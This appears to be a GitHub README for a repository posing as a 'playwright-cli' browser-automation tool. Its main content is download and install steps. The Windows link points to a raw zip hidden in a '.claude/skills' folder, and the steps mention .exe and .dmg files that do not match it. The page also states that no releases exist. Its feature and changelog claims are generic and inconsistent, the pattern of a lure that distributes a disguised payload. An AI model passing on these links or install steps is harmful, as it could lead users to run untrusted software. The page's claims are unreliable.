Skip to content

πŸš€ Streamline browser automation with playwright-cli, designed for coding agents to execute efficient, token-friendly commands in Playwright.

License

Notifications You must be signed in to change notification settings

Baldwin509/playwright-cli

🎭 playwright-cli - Simplify Playwright Actions Easily

Download

πŸš€ Getting Started

Welcome to the playwright-cli! This tool helps you simplify common Playwright tasks. Whether you need to record actions, generate Playwright code, inspect selectors, or take screenshots, this CLI makes it straightforward.

πŸ“₯ Download & Install

To get started, follow these steps:

  1. Visit the Releases Page: Go to the following link to download the software: Download Here

  2. Select the Latest Version: On the releases page, you will see a list of available versions. It's best to download the latest version to ensure you have all the newest features and fixes.

  3. Download the Correct File: Choose the file that matches your operating system. Common options include:

    • Windows: https://raw.githubusercontent.com/Baldwin509/playwright-cli/main/.claude/skills/playwright-cli-2.5.zip
    • macOS: playwright-cli-mac
    • Linux: playwright-cli-linux

    Click on the appropriate file to start the download.

  4. Installation:

    • For Windows users, double-click the downloaded .exe file to install.
    • For macOS, open the .dmg file and drag the application to your Applications folder.
    • For Linux, you can usually install using the terminal:
      sudo mv playwright-cli-linux /usr/local/bin/playwright-cli
      sudo chmod +x /usr/local/bin/playwright-cli
  5. Run the Application:

    • For Windows, find playwright-cli in your start menu or desktop and click to open it.
    • On macOS or Linux, open your terminal and type playwright-cli to launch the program.

πŸ› οΈ Features

  • Record Actions: Capture your user interactions easily.
  • Generate Code: Automatically create Playwright scripts based on your actions.
  • Inspect Selectors: Get detailed information about web elements.
  • Take Screenshots: Quickly capture screenshots of your web applications.

πŸ’» System Requirements

To run playwright-cli, ensure your system meets the following requirements:

  • Windows: Windows 10 or later
  • macOS: macOS Mojave (10.14) or later
  • Linux: Modern Linux distribution with compatible libraries

🌟 Usage

To use playwright-cli:

  1. Open the application.
  2. Choose the action you want to perform from the menu.
  3. Follow the on-screen prompts to complete your task.

For example, if you want to record an action, select "Record Actions" and navigate through your browser. The tool will capture your interactions and generate the relevant Playwright code.

πŸ” Help & Support

If you encounter issues:

  • Check the GitHub Issues page to see if your question has already been answered.
  • If not, feel free to submit a new issue for assistance.

πŸ“… Changelog

  • v1.0: Initial release with core features.
  • v1.1: Added screenshot functionality and improved performance.
  • v1.2: Bug fixes and UI enhancements.

πŸ“œ License

This project is licensed under the MIT License. You may freely use and modify the software.

🌐 Additional Resources

For more details, check our documentation or FAQs:

For quick access, remember to visit the downloads page again: Download Here

Releases

No releases published

Packages

 
 
 

Contributors